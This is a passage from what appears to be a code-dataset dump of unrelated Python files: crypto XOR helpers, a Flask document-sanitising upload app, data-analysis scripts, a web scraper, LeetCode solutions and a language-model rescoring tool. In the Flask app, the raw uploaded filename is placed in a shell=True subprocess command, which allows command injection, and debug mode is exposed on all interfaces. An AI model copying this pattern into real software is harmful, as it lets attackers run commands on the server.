xorBytes(a,b):\n\tc = bytearray([])\n\tfor byte in range(0, len(b)):\n\t\tc.append(a[byte] ^ b[byte])\n\treturn c\n\n\ndef traverse(word, words, plaintext, offsets):\n\tlength = len(word)\n\ta = bytearray(word,'utf8') #drop newline\n\tfor i in range(0, len(plaintext)):\n\t\tb = bytearray(plaintext[i:i+length])\n\t\tc = xorBytes(a,b)\n\t\tif any(val > 122 or val < 65 for val in c):\n\t\t\tcontinue\n\t\telse:\n\t\t\tprint(\"match check\")\n\t\t\tprint(a)\n\t\t\tprint(b)\n\t\t\tprint(c)\n\t\t\tmatch = matchWord(c, a, words, offsets)\n\t\t\tif match != None:\n\t\t\t\tprint(\"match at \", i, \": \" + word + \" with \" + match)\t\t\n\treturn match\n\n\nif __name__ == \"__main__\":\n\trun(sys.argv[1], sys.argv[2], sys.argv[3])\n","sub_path":"pxpa.py","file_name":"pxpa.py","file_ext":"py","file_size_in_byte":1616,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"3"} +{"seq_id":"355431381","text":"\"\"\"\nparse_inference_args.py\n\nImplements method for parsing command line arguments for `gauge_model.py`\n\nAuthor: Sam Foreman (github: @saforem2)\nDate: 04/09/2019\n\"\"\"\nimport sys\nimport argparse\nimport shlex\n\n# from config import process_config\n# from attr_dict import AttrDict\n\nDESCRIPTION = (\n \"\"\"Run inference, either by loading a trained model from a checkpoint\n (specified by the `--log_dir` flag) or with generic HMC by creating a new\n `GaugeModel` instance.\"\"\"\n)\n\n\n# =============================================================================\n# * NOTE:\n# - if action == 'store_true':\n# The argument is FALSE by default. Passing this flag will cause the\n# argument to be ''stored true''.\n# - if action == 'store_false':\n# The argument is TRUE by default. Passing this flag will cause the\n# argument to be ''stored false''.\n# =============================================================================\ndef parse_args():\n \"\"\"Parse command line arguments.\"\"\"\n parser = argparse.ArgumentParser(\n description=DESCRIPTION,\n fromfile_prefix_chars='@',\n )\n parser.add_argument('--overwrite',\n dest='overwrite',\n required=False,\n action='store_true',\n help=(\"\"\"Flag that when passed will overwrite existing\n run directory with new inference data.\"\"\"))\n\n parser.add_argument('--log_dir',\n dest='log_dir',\n required=False,\n default=None,\n help=(\"\"\"Path to `log_dir` containing trained model on\n which to run inference.\"\"\"))\n\n parser.add_argument(\"--run_steps\",\n dest=\"run_steps\",\n type=int,\n default=2000,\n required=False,\n help=(\"\"\"Number of evaluation 'run' steps to perform\n after training (i.e. length of desired chain\n generate using trained L2HMC sample).\n (Default: 5000)\"\"\"))\n\n parser.add_argument(\"--beta\",\n dest=\"beta\",\n type=float,\n default=None,\n required=False,\n help=(\"\"\"Flag specifying a singular value of beta at\n which to run inference using the trained\n L2HMC sampler. (Default: None\"\"\"))\n\n parser.add_argument(\"--eps\",\n dest=\"eps\",\n type=float,\n default=None,\n required=False,\n help=(\"\"\"Flag specifying value of `eps` to use.\"\"\"))\n\n parser.add_argument(\"--charge_weight\",\n dest=\"charge_weight\",\n type=float,\n default=0.1,\n required=False,\n help=(\"\"\"Multiplicative factor used to weigh relative\n strength of top. charge term in loss\n function.\\n (Default: 0.)\"\"\"))\n\n parser.add_argument(\"--plaq_weight\",\n dest=\"plaq_weight\",\n type=float,\n default=10.,\n required=False,\n help=(\"\"\"Multiplicative factor used to weigh relative\n strength of plaquette difference term in loss\n function.\\n (Default: 0.)\"\"\"))\n\n #################################\n # Flags for running generic HMC\n #################################\n\n parser.add_argument('--hmc',\n dest='hmc',\n action='store_true',\n required=False,\n help=\"\"\"Run generic HMC.\"\"\")\n\n parser.add_argument('--x_shape',\n dest='x_shape',\n type=lambda s: [int(i) for i in s.split(',')],\n default=\"128, 16, 16, 2\",\n required=False,\n help=(\"\"\"Specifies the shape of our data, with:\n x_shape =\n (batch_size, time_size, space_size, dim)\n Defaults to: (128, 16, 16, 2)\"\"\"))\n\n parser.add_argument(\"-n\", \"--num_steps\",\n dest=\"num_steps\",\n type=int,\n default=None,\n required=False,\n help=(\"\"\"Number of leapfrog steps to use in (augmented)\n HMC sampler.\\n(Default: 5)\"\"\"))\n\n if sys.argv[1].startswith('@'):\n args = parser.parse_args(shlex.split(open(sys.argv[1][1:]).read(),\n comments=True))\n else:\n args = parser.parse_args()\n\n return args\n","sub_path":"l2hmc-qcd/utils/parse_inference_args.py","file_name":"parse_inference_args.py","file_ext":"py","file_size_in_byte":5082,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"3"} +{"seq_id":"607920914","text":"from flask import Flask, render_template, request, send_file\nfrom werkzeug.utils import secure_filename\nimport os\nimport subprocess\n\napp = Flask(__name__)\n\n@app.route('/')\ndef index():\n return render_template('index.html')\n\n#파일 업로드 처리\n@app.route('/fileUpload', methods = ['GET', 'POST'])\ndef upload_file():\n if request.method == 'POST':\n f = request.files['file']\n #저장할 경로 + 파일명\n filename = f.filename\n path = '/tmp/'\n f.save(path + secure_filename(filename))\n uploadpath = \" \" + path + filename + \" \"\n\n subprocess.call([\"/usr/bin/dangerzone-container\" \" documenttopixels --document-filename\" + uploadpath + \"--pixel-dir /tmp/dangerzone-pixel --container-name flmcode/dangerzone\"], shell=True)\n subprocess.call([\"/usr/bin/dangerzone-container\" \" pixelstopdf --pixel-dir /tmp/dangerzone-pixel --safe-dir /tmp/dangerzone-safe --container-name flmcode/dangerzone --ocr 0 --ocr-lang eng\"], shell=True)\n\n os.rename(\"/tmp/dangerzone-safe/safe-output-compressed.pdf\", \"/tmp/dangerzone-safe/\" + filename + \"_\" + \"safe-output.pdf\")\n\n return send_file(\"/tmp/dangerzone-safe/\" + filename + \"_\" + \"safe-output.pdf\", mimetype='application/pdf')\n\n\nif __name__ == '__main__':\n #서버 실행\n app.run(host='0.0.0.0',port=5000,debug = True)\n","sub_path":"dangerzone_project/app.py","file_name":"app.py","file_ext":"py","file_size_in_byte":1315,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"3"} +{"seq_id":"262071712","text":"import numpy as np\r\nimport matplotlib.pyplot as plt\r\nimport datetime as dt \r\nimport pandas_datareader.data as web\r\nimport pandas as pd\r\nfrom scipy.optimize import minimize\r\nfrom scipy import log\r\nfrom scipy import exp\r\nfrom numpy import array\r\nfrom numpy import delete\r\nfrom numpy import sum\r\nfrom numpy.linalg import inv\r\nfrom numpy import transpose as tp\r\nfrom matplotlib import cm\r\nfrom scipy.stats.stats import pearsonr\r\nfrom mpl_toolkits.mplot3d import Axes3D\r\n\r\nksp = web.get_data_google('KRX:KOSPI', dt.datetime(2010,7,17), dt.datetime(2017,1,20))\r\nstock=web.get_data_google('KRX:039490', dt.datetime(2010,7,17), dt.datetime(2017,1,20))\r\n\r\ny=delete(log(array(stock['Close'])/array(stock['Open'])),[0,1])\r\nx1=log(delete(array(ksp['Close']),0)/delete(array(ksp['Close']),array(ksp['Close']).size-1))\r\nx1=delete(x1,x1.size-1)\r\nx2=log(delete(array(stock['Close']),0)/delete(array(stock['Close']),array(stock['Close']).size-1))\r\nx2=delete(x2,x2.size-1)\r\nx3=delete(array(ksp['Volume']),[0,array(stock['Volume']).size-1])\r\nx3=x3/1000\r\n\r\nvariable=array([[y.size,sum(x1),sum(x2),sum(x3)],[sum(x1),x1@x1.T,x1@x2.T,x1@x3.T],\r\n [sum(x2),x2@x1.T,x2@x2.T,x2@x3.T],[sum(x3),x3@x1.T,x3@x2.T,x3@x3.T]])\r\nexpect=array([[sum(y)],[y@x1.T],[y@x2.T],[y@x3.T]])\r\ncoef=inv(variable)@expect\r\n\r\nsysearn=array([])\r\nconearn=array([])\r\navearn=array([])\r\nprofit=1\r\naverage=1\r\nexya=array([])\r\nfor i in range(y.size-1):\r\n exy=coef[0]+x1[i]*coef[1]+x2[i]*coef[2]+x3[i]*coef[3]\r\n average=average*(1+y[i])\r\n exya=np.append(exya,exy)\r\n avearn=np.append(avearn,stock['Close'][i+2]/stock['Close'][2])\r\n if exy>0:\r\n profit=profit*(1+y[i])\r\n conearn=np.append(conearn,average)\r\n sysearn=np.append(sysearn,profit)\r\n if i>1400:\r\n print(ksp.index[i+2],average,profit,stock['Close'][i+2]/stock['Close'][2])\r\nvdf=[x1,x2,x3,y]\r\nvcoef=np.zeros((4,4))\r\nfor u in range (4):\r\n for v in range (4):\r\n vcoef[u,v]=pearsonr(vdf[u],vdf[v])[0]\r\nprint(\"regression coefficient\")\r\nprint(coef.T)\r\nprint(\"variable correlation array\")\r\nprint(vcoef)\r\nexcoef=np.zeros(4)\r\nfor u in range (4):\r\n excoef[u]=pearsonr(exya,delete(vdf[u],vdf[u].size-1))[0]\r\nprint(\"explanatory variable correlation array\")\r\nprint(excoef)\r\n\r\npd.DataFrame(np.append(np.append([conearn],[sysearn],axis=0),[avearn],axis=0)\r\n .T,columns=['control','experimental','average']).plot()\r\n\r\nfig = plt.figure()\r\nmarkers=['o' if exya[i]>0 else 'x' for i in range(exya.size)]\r\nax = fig.add_subplot(111, projection='3d')\r\nx1m=array([])\r\nx2m=array([])\r\nx3m=array([])\r\nym=array([])\r\nfor i in range(y.size-1):\r\n if exya[i]>0:\r\n x1m=np.append(x1m,x1[i])\r\n x2m=np.append(x2m,x2[i])\r\n x3m=np.append(x3m,x3[i])\r\n ym=np.append(ym,y[i])\r\np=ax.scatter(x1m, x2m, x3m, c=ym, cmap=plt.hot(), marker='o')\r\nx1m=array([])\r\nx2m=array([])\r\nx3m=array([])\r\nym=array([])\r\nfor i in range(y.size-1):\r\n if exya[i]<0:\r\n x1m=np.append(x1m,x1[i])\r\n x2m=np.append(x2m,x2[i])\r\n x3m=np.append(x3m,x3[i])\r\n ym=np.append(ym,y[i])\r\np=ax.scatter(x1m, x2m, x3m, c=ym, cmap=plt.hot(), marker='x')\r\nfig.colorbar(p,ax=ax)\r\nplt.show()\r\n","sub_path":"pandasmultiregressionmatplot.py","file_name":"pandasmultiregressionmatplot.py","file_ext":"py","file_size_in_byte":3140,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"3"} +{"seq_id":"513244","text":"# http://lifelines.readthedocs.io/en/latest/Survival%20analysis%20with%20lifelines.html\n\nfrom matplotlib.pylab import plt\nfrom lifelines.datasets import load_dd\nfrom lifelines import KaplanMeierFitter\n\ndata = load_dd()\n\n# checking proportional hazards assumption\n# https://www.stat.ubc.ca/~rollin/teach/643w04/lec/node69.html\n\n# if the curves are parallel (and hence do not cross each other),\n# then it's likely the variable satisfies the assumption.\n# if the curves do cross, likely you'll have to \"stratify\" the variable\n\n# In lifelines, the KaplanMeierFitter object has a .plot_loglogs function for this purpose\n\ndemocracy_0 = data.loc[data['democracy'] == 'Non-democracy']\ndemocracy_1 = data.loc[data['democracy'] == 'Democracy']\n\nkmf0 = KaplanMeierFitter()\nkmf0.fit(democracy_0['duration'], event_observed=democracy_0['observed'])\n\nkmf1 = KaplanMeierFitter()\nkmf1.fit(democracy_1['duration'], event_observed=democracy_1['observed'])\n\nfig, axes = plt.subplots()\nkmf0.plot_loglogs(ax=axes)\nkmf1.plot_loglogs(ax=axes)\n\naxes.legend(['Non-democracy', 'Democracy'])\n\nplt.show()\n\n","sub_path":"StatisticProblem/lifelinesSampleCode/checkingProp.py","file_name":"checkingProp.py","file_ext":"py","file_size_in_byte":1078,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"3"} +{"seq_id":"497711359","text":"'''\n 02/21/2019\n Python 1 - Spring 2019\n Loopy in-class assignment :) - Calculate an average grade\n\n This program asks the user to enter as many grades as they like, and\n this will tally an average for them.\n\n\nIn-class assignment to turn in:\nRedo your grading assignment from a couple of weeks ago, but this time with loops!\n \nAlso, instead of taking in three grades, have it take grades until the user indicates \nthey are finished (using a sentinel value). \n\nYour program should only accept valid grades (from 0 to 100). \n\nOutput the average grade to one decimal place, with a helpful message to the user. \n(Don’t use round().)\n\n\n1) Turn in the planning document and the code you've written as of the end of the class. \n If you don't finish, it's fine; just be sure to turn in your finished code with your homework.\n'''\n\n#Display a welcome message & usage info to user\nprint(\"Welcome to the grade average calculator!\")\nprint(\"Please provide as many grade numbers (not letters!) and I will average them for you.\") \n\n# Initialize variables\ngrade_sum = 0.0 # accumulator\ngrade_count = 1 # counter\n\n#Get user input\ngrade = input(\"Please enter a grade between 0 - 100 or 'q' to quit: \")\n\n#A little more input validation, in case user enters another letter\nwhile grade.isalpha() and grade != 'q': #read about this function in Mark lutz' _Learning Python_ \n grade = input(\"Sorry, that is not a valid input, please enter a grade between 0 - 100 or 'q' to quit: \")\n \n# While sentinal isn't tripped, keep a count and running tally\nwhile grade != 'q':\n # Cast the input to a float\n grade = float(grade)\n \n # While user input is invalid, ask them for valid input\n while grade < 0 or grade > 100:\n grade = input(\"Problem! Please enter a valid grade between 0 - 100: \")\n grade = float(grade)\n \n # Calculate the running tallies\n grade_count += 1\n grade_sum = grade + grade_sum \n \n grade = input(\"Please enter a grade between 0 - 100 or 'q' to quit: \")\n while grade.isalpha() and grade != 'q': #same as line 39_ \n grade = input(\"Sorry, that is not a valid input, please enter a grade between 0 - 100 or 'q' to quit: \")\n \n# Calculate a sum of the grades\n\n# if user enters letters and then quits, show this message \nif grade_count - 1 == 0:\n print(\"Thank you for using this tool\")\n\n# After user quits, display the final calculated results\nelse: \n print(\"The average of the\" , grade_count - 1, \"scores you entered is\" , format(grade_sum / (grade_count - 1), '.1f') ) \n\n","sub_path":"assignments/assignment-05/homework_05_inClass.py","file_name":"homework_05_inClass.py","file_ext":"py","file_size_in_byte":2563,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"3"} +{"seq_id":"58751520","text":"from preprocess.functions.month_to_crimes import *\nimport folium\nimport webbrowser\nfrom folium.plugins import HeatMap\nimport json\n\npath_csv1 = \"/home/maresoc870/Documents/Stopien_II/Semestr_2/AS/Code2/CRIMES/preprocess/processed_csvs/arrest_location2018.csv\"\ncrimes_df = pd.read_csv(path_csv1)\n\npath_csv = \"/home/maresoc870/Documents/Stopien_II/Semestr_2/AS/Code2/CRIMES/preprocess/processed_csvs/Police_Stations_processed.csv\"\npolice_df = pd.read_csv(path_csv)\n#police_df.loc[police_df['DISTRICT'] == 'Headquarters','DISTRICT'] = '0' # Headquaters -> 0\n#police_df['DISTRICT'] = police_df['DISTRICT'].astype(np.uint8) # 'DISTRICT' type -> uint8\n\nmap = folium.Map(location=(41.881832,-87.623177), zoom_start=12)\n\n# definition of the boundaries in the map\ndistrict_geo = r'/home/maresoc870/Documents/Stopien_II/Semestr_2/AS/ChicagoCrimes/boundaries.json'\n\n# calculating total number of incidents per district\ncrimedata2 = pd.DataFrame(crimes_df['District'].value_counts().astype(float))\ncrimedata2.to_json('./crimeagg.json')\ncrimedata2 = crimedata2.reset_index()\ncrimedata2.columns = ['District', 'Number']\nprint(crimes_df.columns)\n# creation of the choropleth\n\narrests_district = crimes_df[['Arrest', 'District']].groupby(['District'], as_index=False).agg('sum')\n\nfolium.Choropleth(\n geo_data='./crimeagg.json',\n name='Chicago Districts',\n data=arrests_district,\n columns=['District', 'Arrest'],\n key_on='feature.id',\n fill_color='YlOrBr',\n fill_opacity=0.7,\n line_opacity=0.1\n).add_to(map)\n\nfolium.LayerControl().add_to(map)\n\n#map.render()\nmap.save(\"/home/maresoc870/Documents/Stopien_II/Semestr_2/AS/Code2/CRIMES/maps/map1.html\")\nwebbrowser.open(\"/home/maresoc870/Documents/Stopien_II/Semestr_2/AS/Code2/CRIMES/maps/map1.html\")\n\n","sub_path":"visualisations/map_folium/wards_map.py","file_name":"wards_map.py","file_ext":"py","file_size_in_byte":1754,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"3"} +{"seq_id":"402206951","text":"import requests\n\n\n# 爬取百度贴吧前一千页\n\nclass Spider:\n def __init__(self, name):\n self.name = name\n self.url_temp = \"https://tieba.baidu.com/f?kw=\" + name + \"&ie=utf-8&pn={}\"\n self.headers = {\n \"User-Agent\": \"Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/71.0.3578.98 Safari/537.36\"}\n\n def get_url_list(self): # 构造url列表\n\n return [self.url_temp.format(i * 50) for i in range(1000)] # 爬取贴吧前1000页\n\n def parse_url(self, url):\n response = requests.get(url, headers=self.headers)\n return response.content.decode()\n\n def save_html(self, html_str, page_num):\n file_path = '{}--第{}页.html'.format(self.name, page_num)\n with open(file_path, 'w', encoding='utf-8') as f:\n f.write(html_str)\n\n def run(self): # 实现主要逻辑\n # 1.构造url\n url_list = self.get_url_list()\n # 2.遍历,发送请求,获取响应\n for url in url_list:\n html_str = self.parse_url(url)\n page_num = url_list.index(url) + 1 # 页码数\n # 3.保存\n self.save_html(html_str, page_num)\n\n\nif __name__ == '__main__':\n tieba_spider = Spider(\"dota2\")\n tieba_spider.run()\n","sub_path":"01_tieba.py","file_name":"01_tieba.py","file_ext":"py","file_size_in_byte":1289,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"3"} +{"seq_id":"502895857","text":"#coding=utf-8\n'''\nauthor: @supercaizehua\ndata: 2020-7-2 05:06:52\n---------------------------------------------------------------\n理解题意:\n输入字符串 只包含 3种括号对\n输出是否有效\n有效条件\n- 左括号必须用相同类型右括号闭合\n- 左括号必须以正确的顺序闭合 [(]) 就不是有效的字符串\n'''\n\n'''\n1.暴力法\n循环,每次匹配到一对有效括号就替换成空字符\n时间O(n^2) 空间O(1) 为什么是O(n^2)\n'''\nclass Solution1:\n def isValid(self, s: str) -> bool:\n L = len(s)\n L1 = L\n if L % 2 != 0: return False\n while L:\n s = s.replace('{}', '').replace('[]', '').replace('()', '')\n L = len(s) \n if L == L1: return False\n L1 = L\n return True\n\nclass Solution1_1:#国际版大神 pythonic 天下第一!\n def isValid(self, s: str) -> bool:\n while '[]' in s or '()' in s or '{}' in s:\n s = s.replace('{}', '').replace('[]', '').replace('()', '')\n return not len(s)\n'''\n2.栈\n- 遇到左括号入栈,遇到右括号就弹出对应栈顶左括号\n- 建立hash表, key左括号, value右括号, 用于查询是否对应 O(1)时间\n\n边界问题\n- stack为空的时候, stack.pop()报错, 可以想链表添一个dummy头一样, 可以给stack一个初值, 同时在hash表中说明k-v\n- 以左括号结尾, 遍历完整个s后, stack还有未出栈的左括号, 最后需要判断一下\n\n时间O(n), 空间O(n)\n'''\nclass Solution2:\n def isValid(self, s: str) -> bool:\n dic = {'{':'}', '[':']', '(':')', '0':'0'}\n stack = ['0']\n for i in s:\n if i in dic: \n stack.append(i)\n elif dic[stack.pop()] != i:\n return False\n return stack.pop() == '0'","sub_path":"Week01/20-valid-parentheses.py","file_name":"20-valid-parentheses.py","file_ext":"py","file_size_in_byte":1792,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"3"} +{"seq_id":"315533096","text":"from martelo import *\n\n\ndef process(i):\n info = {'id': i}\n\n link = 'http://fatalities.dmp.wa.gov.au/fatalities/detail.asp?id=%s' % i\n r = requests.get(link)\n soup = soupify(r)\n\n table = select(soup, 'div#01SuggestionPositioningAnchor table')[0]\n _temp = [[col.text for col in select(row, 'td')] for row in select(table, 'tr')]\n\n two = filter(lambda l: len(l) == 2, _temp)\n one = filter(lambda l: len(l) == 1, _temp)\n\n for key, value in two:\n key = key.lower().replace(':', '').encode('utf-8')\n value = value.replace(' ', '').strip().encode('utf-8')\n if value != '':\n info[key] = value\n\n for o in one:\n o = o[0]\n o = o.replace(' ', '').strip().encode('utf-8')\n if o and 'report' in o.lower():\n info['report type'] = o.lower()\n\n return info\n\nimport multiprocessing\n\npool = multiprocessing.Pool()\ndata = pool.map(process, (i for i in range(1, 652)))\ndata2xls(data, sample=True)\n\n# for i in range(1, 652):\n# print process(i)\n# break\n","sub_path":"fatalities.dmp.wa.gov.au/mining.py","file_name":"mining.py","file_ext":"py","file_size_in_byte":1044,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"3"} +{"seq_id":"523268202","text":"def intersection(arrays):\n # instantiate dict for key value - num and count\n itemcount = dict()\n # initialize array to add the intersections\n result = []\n\n # iteration over the arr list\n for i, nums in enumerate(arrays):\n # then iterate over the list in the larger list\n for num in nums:\n # if item has a count already and index > 1, we increment the count\n if itemcount.get(num) is not None and i > 0:\n # num becomes the key and increment curr val by one\n itemcount[num] = itemcount[num] + 1\n # if no entry with num in dict set index to one\n elif itemcount.get(num) is None and i == 0:\n itemcount[num] = 1\n else:\n continue\n\n for numb in itemcount:\n # if number count == array.length()\n if itemcount[numb] == len(arrays):\n # append the number to the intersection list\n result.append(numb)\n\n return result\n\n\nif __name__ == \"__main__\":\n arrays = []\n\n arrays.append(list(range(1000000,2000000)) + [1,2,3])\n arrays.append(list(range(2000000,3000000)) + [1,2,3])\n arrays.append(list(range(3000000,4000000)) + [1,2,3])\n\n print(intersection(arrays))\n","sub_path":"hashtables/ex3/ex3.py","file_name":"ex3.py","file_ext":"py","file_size_in_byte":1247,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"3"} +{"seq_id":"277701281","text":"import heapq\nfrom math import hypot\n\n\nclass Solution(object):\n\n def kClosest(self, points, K):\n \"\"\"\n We have a list of points on the plane. Find the K closest points to the origin (0, 0).\n\n (Here, the distance between two points on a plane is the Euclidean distance.)\n\n You may return the answer in any order. The answer is guaranteed to be unique (except for the order that it is\n in.)\n\n Note:\n 1 <= K <= points.length <= 10000\n -10000 < points[i][0] < 10000\n -10000 < points[i][1] < 10000\n\n 83 / 83 test cases passed.\n Status: Accepted\n Runtime: 676 ms\n Memory Usage: 19.3 MB\n\n\n Parameters\n ----------\n points : list\n\n K : int\n\n\n Returns\n -------\n ret : list\n\n\n Examples\n --------\n >>> Solution().kClosest([[1, 3], [-2, 2]], 1)\n [[-2,2]]\n\n >>> Solution().kClosest([[3, 3], [5, -1], [-2, 4]], 2)\n [[3, 3], [-2, 4]]\n \"\"\"\n\n heap = []\n for point in points:\n if len(heap) < K:\n heapq.heappush(heap, (-hypot(point[0], point[1]), point))\n else:\n heapq.heappushpop(heap, (-hypot(point[0], point[1]), point))\n\n return [_[1] for _ in heap]\n","sub_path":"algorithms/may_challenge/30_K_Closest_Points_to_Origin.py","file_name":"30_K_Closest_Points_to_Origin.py","file_ext":"py","file_size_in_byte":1300,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"3"} +{"seq_id":"59202699","text":"# Created byMartin.cz\n# Copyright (c) Martin Strohalm. All rights reserved.\n\nimport pero\n\n\nclass DrawTest(pero.Graphics):\n \"\"\"Test case for path bbox calculation.\"\"\"\n \n \n def draw(self, canvas, *args, **kwargs):\n \"\"\"Draws the test.\"\"\"\n \n # clear canvas\n canvas.fill(pero.colors.White)\n \n # init glyphs\n pather = pero.Pather(\n show_handles = False)\n \n bbox = pero.Rect(\n line_color = pero.colors.Red,\n fill_color = None)\n \n # rect\n path = pero.Path().rect(50, 50, 100, 100)\n matrix = pero.Matrix().rotate(pero.rads(45), x=100, y=100)\n path.transform(matrix)\n pather.draw(canvas, path=path)\n \n box = path.bbox()\n bbox.draw(canvas, x=box.x, y=box.y, width=box.width, height=box.height)\n \n # circle\n path = pero.Path().circle(250, 100, 50)\n matrix = pero.Matrix().rotate(pero.rads(45), x=250, y=100)\n path.transform(matrix)\n pather.draw(canvas, path=path)\n \n box = path.bbox()\n bbox.draw(canvas, x=box.x, y=box.y, width=box.width, height=box.height)\n \n # path\n path = pero.Path() \\\n .move_to(380, 50) \\\n .curve_to(450, 50, 310, 150, 380, 150) \\\n .curve_to(450, 150, 310, 50, 380, 50)\n \n matrix = pero.Matrix().rotate(pero.rads(45), x=380, y=100)\n path.transform(matrix)\n pather.draw(canvas, path=path)\n \n box = path.bbox()\n bbox.draw(canvas, x=box.x, y=box.y, width=box.width, height=box.height)\n\n\n# run test\nif __name__ == '__main__':\n pero.debug(DrawTest(), 'show', \"Path Bounding Box\", 450, 200)\n","sub_path":"examples/drawing/draw_path_bbox.py","file_name":"draw_path_bbox.py","file_ext":"py","file_size_in_byte":1737,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"3"} +{"seq_id":"214836894","text":"import numpy as np\nfrom ROOT import *\n#from helper.helper import tConvert,calcVelo,makeCumul,percentage,new_arr,diff,delta\nfrom helper.laufen import *\n#import os\n#import time\n#from datetime import date\ndef main():\n\n #km5,t5,bpm,day,km1,t1,km2,t2,km3,t3,km4,t4= np.genfromtxt('data.txt', unpack=True)\n minute,second,km,bpm,bpm_max,day,month,year= np.genfromtxt('../../dataLight2.txt', unpack=True)\n bpm=bpm.astype('d')\n bpm_max=bpm_max.astype('d')\n day=day.astype('d')\n # t1,t1min = tConvert(t1)\n # vel1=calcVelo(km5,t5)\n # t2,t2min = tConvert(t2)\n # vel2=calcVelo(km5,t5)\n # t3,t3min = tConvert(t3)\n # vel3=calcVelo(km5,t5)\n # t4,t4min = tConvert(t4)\n # vel4=calcVelo(km5,t5)\n t5,t5min = tConvert(t5)\n vel5=calcVelo(km5,t5)\n\n c1 = TCanvas(\"LaufKumul\",\"laufkumul\",200,9,700,500)\n MakeCumulPlot(c1,day,km5)\n\n c2 = TCanvas(\"ProzentGelaufen\",\"anteil\",915,9,700,500)\n MakePercPlot(c2,day)\n\n c3 = TCanvas(\"bpm_avg\",\"bpm_avg\",200,9,700,500)\n MakeBPMPlots(c3,day,bpm)\n\n c4= TCanvas(\"ZeitStrecke\",\"ZeitStrecke\", 915,567,700,500)\n Make2DPlot(c4,t5min,km5)\n\n c11= TCanvas(\"ZeitStrecke_old\",\"ZeitStrecke_old\", 915,567,700,500)\n MakeOld2DPlot(c11,t5min,km5)\n\n c5 = TCanvas(\"bpm_max\",\"bpm_max\",200,9,700,500)\n MakeBPMPlots(c5,day,bpm_max,option=\"max\")\n\n c6 = TCanvas(\"laufen2016\",\"laufen\",1200,1000)\n MakeFourPlots(c6,day,t5min,vel5)\n\n c7 = TCanvas(\"tag\", \"TagGelaufen\",1200,1000)\n MakeDayPlot(c7,day)\n\n c8 = TCanvas(\"monat\", \"MonatGelaufen\",1200,1000)\n MakeMonthPlot(c8,day,2016)\n\n c12 = TCanvas(\"monat_km\", \"MonatKMGelaufen\",1200,1000)\n MakeMonthKMPlot(c12,day,2016,km5)\n\n c13 = TCanvas(\"zeitprokm\", \"zeitprokm\",1200,1000)\n MakeMPKPlot(c13,vel5)\n\n c10 = TCanvas(\"LBLcomp\", \"LBL comparison\",1200,1000)\n MakeLBLPlot(c10,day,vel5)\n\n gew,day1= np.genfromtxt('../../stats.txt', unpack=True)\n gew=gew.astype('d')\n day1=day1.astype('d')\n\n c9 = TCanvas(\"gewicht\",\"gewicht\",200,9,1400,500)\n MakeStats(c9,day1,gew,day)\n\n\nif __name__==\"__main__\":\n main()\n","sub_path":"python/rootversion/laufen_2.py","file_name":"laufen_2.py","file_ext":"py","file_size_in_byte":2059,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"3"} +{"seq_id":"256507993","text":"# coding: utf-8\nimport argparse\nimport time\nimport math\nimport os, sys\nimport tempfile\n\nimport torch\nimport numpy as np\nimport torch.nn as nn\nimport torch.optim as optim\nfrom data_utils import get_lm_corpus\nfrom mem_transformer import MemTransformerLM\nfrom utils.exp_utils import get_logger\n\nparser = argparse.ArgumentParser(description='PyTorch Transformer Language Model')\nparser.add_argument('--data', type=str, default='../data/web-dsp/',\n help='location of the data corpus')\nparser.add_argument('--tmp', type=str, default='tmp/t',\n help='location of the temporary file used in this tool')\nparser.add_argument('--out-dir', type=str, default='generated',\n help='location of the output directory')\nparser.add_argument('--nbest-file', type=str, default='../../nbest/devel/chain-200best-morph/text',\n help='location of the nbest file')\nparser.add_argument('--models', type=str, default='20191112-102012 20191022-134318',\n help='list of model ids to be used for rescoring')\nparser.add_argument('--sent-sep', type=str, default='',\n help='sentence separator symbol')\nparser.add_argument('--dataset', type=str, default='wdtrain',\n choices=['Ktrain', 'wdtrain', 'wdtrain-morph'],\n help='dataset name')\nparser.add_argument('--ext-len', type=int, default=0,\n help='length of the extended context')\nparser.add_argument('--mem-len', type=int, default=0,\n help='length of the retained previous heads')\nparser.add_argument('--clamp-len', type=int, default=-1,\n help='max positional embedding index')\nparser.add_argument('--cuda', action='store_true',\n help='use CUDA')\nparser.add_argument('--work-dir', type=str, default='./',\n help='path to the work_dir')\nparser.add_argument('--same-length', action='store_true',\n help='set same length attention with masking')\nargs = parser.parse_args()\n\nassert args.ext_len >= 0, 'extended context length must be non-negative'\n\nif torch.cuda.is_available():\n if not args.cuda:\n print('WARNING: You have a CUDA device, so you should probably run with --cuda')\n\ndevice = torch.device('cuda' if args.cuda else 'cpu')\n\n# Load dataset\nall_ids = []\nspace_counter = 0\ntmpfile = open(args.tmp, 'w', encoding='utf-8')\nwith open(args.nbest_file, \"r\", encoding=\"utf-8\") as reader:\n while True:\n line = reader.readline()\n if not line:\n break\n\n line = line.strip()\n tokens = line.split(\" \", 1)\n if len(tokens) == 1:\n tokens.append(args.sent_sep)\n\n all_ids.append(tokens[0])\n tmpfile.write(tokens[1] + '\\n')\n\ntmpfile.close()\n\n\ndef rescore(corpus, nbest_file, model, ext_len, mem_len, outfile):\n encoded_sent = corpus.vocab.encode_file(path=nbest_file, add_double_eos=True)\n for idx, sent in enumerate(encoded_sent):\n streams = [None] * 1\n bptt = len(list(sent)) - 1\n data = torch.LongTensor(bptt, 1)\n target = torch.LongTensor(bptt, 1)\n model.reset_length(bptt, ext_len, mem_len)\n n_retain = 0\n \n # data : [n_retain+bptt x bsz]\n # target : [bptt x bsz]\n data[n_retain:].fill_(-1)\n target.fill_(-1)\n for i in range(1):\n n_filled = 0\n while n_filled < bptt:\n if 